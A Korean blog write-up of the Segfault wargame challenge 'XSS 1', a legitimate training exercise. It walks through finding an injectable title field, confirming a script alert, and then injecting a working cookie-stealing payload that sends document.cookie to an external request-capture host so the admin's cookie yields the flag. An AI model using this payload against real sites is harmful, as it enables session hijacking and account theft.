<Segfault> 워게임 문제풀이 [XSS 1]

2024. 6. 26. 15:22·워게임 문제풀이/Segfault

이번시간은 Segfault 사이트의 'xss 1' 워게임 Write up 입니다.

<목차>

1. XSS 포인트 찾기
2. POC(Proof of Concept) 실행 확인
3. 관리자 쿠키 탈취

 

 


1. XSS 포인트 찾기

 

우선 특수문자 사용이 가능한지 체크해보도록 하겠습니다.

Tesing Page http://ctf.segfaulthub.com:4343/xss_1/notice_read.php?
제목/ 내용 < " ' > / < " ' >

결과

 

=> 제목칸에서 특수문자가 입력가능한 것이 확인되었다.

그러면 POC(Proof Of Concept) 코드를 작성해서 시도해보자.

 


2. POC(Proof of Concept) 실행 확인

 

Testing Page http://ctf.segfaulthub.com:4343/xss_1/notice_read.php?
제목  <script>alert(1)</script>

 


결과

 

=>  제목칸에 넣어준 스크립트 코드가 잘 작동하는것을 확인하였다. 이제 쿠키탈취 코드를 삽입해보자.


 

<쿠키탈취 스크립트 실행>

Vunarable Page http://ctf.segfaulthub.com:4343/xss_1/notice_read.php?
입력값(제목칸) <script>var data=document.cookie; var i = new Image(); i.src="https://encxlimxsq6z.x.pipedream.net?cookie="+data</script>

 

※ 쿠키탈취를 위한 서버는 https://public.requestbin.com/r/ 를 이용하였습니다.


결과

 

쿠키가 무사히 전송 된것을 확인하였습니다

 


3. 관리자 쿠키 탈취.

 

관리자 컴퓨터(클라이언트)가 스크립트를 작성한 사이트에 접속하도록 링크를 넣어줍니다.


결과

 

플래그를 무사히 얻을 수 있었습니다.


 

긴 글 읽어주셔서 감사합니다!

'워게임 문제풀이 > Segfault' 카테고리의 다른 글

<Segfault> 워게임 문제풀이 [XSS 3]  (0) 2024.07.01
<Segfault> 워게임 문제풀이 [XSS 2]  (0) 2024.06.30
<Segfault> 워게임 문제풀이 [7편]-Blind SQL Injection  (1) 2024.05.31
<Segfault> 워게임 문제풀이[6편] - SQL Injection3  (1) 2024.05.31
<Segfault> 워게임 문제풀이 [5편] - Secret Login  (1) 2024.05.22
'워게임 문제풀이/Segfault' 카테고리의 다른 글
  • <Segfault> 워게임 문제풀이 [XSS 3]
  • <Segfault> 워게임 문제풀이 [XSS 2]
  • <Segfault> 워게임 문제풀이 [7편]-Blind SQL Injection
  • <Segfault> 워게임 문제풀이[6편] - SQL Injection3
무너박사
무너박사
IT 보안 블로그 입니다. 제가 작성하는 블로그가 누군가의 공부에 조금이라도 도움이 되길 바라며 작성하였습니다.
  • 무너박사
    무너박사의 연구일지
    무너박사
  • 전체
    오늘
    어제
    • 분류 전체보기 (104)
      • WEB 지식 (3)
      • 웹해킹 (13)
      • 웹개발(PHP-Mysql) (12)
      • 웹개발(JSP-Oracle) (2)
      • 워게임 문제풀이 (19)
        • Segfault (17)
        • Dreamhack (2)
      • SQL (3)
      • Python (2)
      • AI (1)
        • LLM(Large Language Model) (1)
      • Kail Linux (3)
      • 잡다한 지식 (2)
      • 모바일 앱개발(Kotlin-PHP-Mysql) (13)
      • 모바일 앱해킹(Android) (31)
        • Frida Lab (2)
        • Android DIVA (8)
        • Insecure Bank (20)
      • 안드로이드 위협 탐지 및 우회 (0)
        • 루팅 탐지 & 우회 (0)
        • 디버깅 탐지 & 우회 (0)
        • 에뮬레이터 탐지 & 우회 (0)
        • Frida 탐지 & 우회 (0)
  • 블로그 메뉴

    • 링크

    • 공지사항

    • 인기 글

    • 태그

      normaltic
      안드로이드 스튜디오
      취업반6기
      취업반 6기
      Blind sql injection
      칼리리눅스
      XSS
      dom based xss
      인시큐어 뱅크
      Android Studio
      모바일 앱개발
      시스템해킹
      해킹
      mobile diva
      php
      인시큐어뱅크
      Koltin
      Kotlin
      모의해킹
      MySQL
      앱해킹
      워게임
      insecure bank
      리패키징
      android diva
      모바일 앱해킹
      웹해킹
      모바일앱개발
      sql injection
      취업반
    • 최근 댓글

    • 최근 글

    • hELLO· Designed By정상우.v4.10.3
    무너박사
    <Segfault> 워게임 문제풀이 [XSS 1]
    상단으로

    티스토리툴바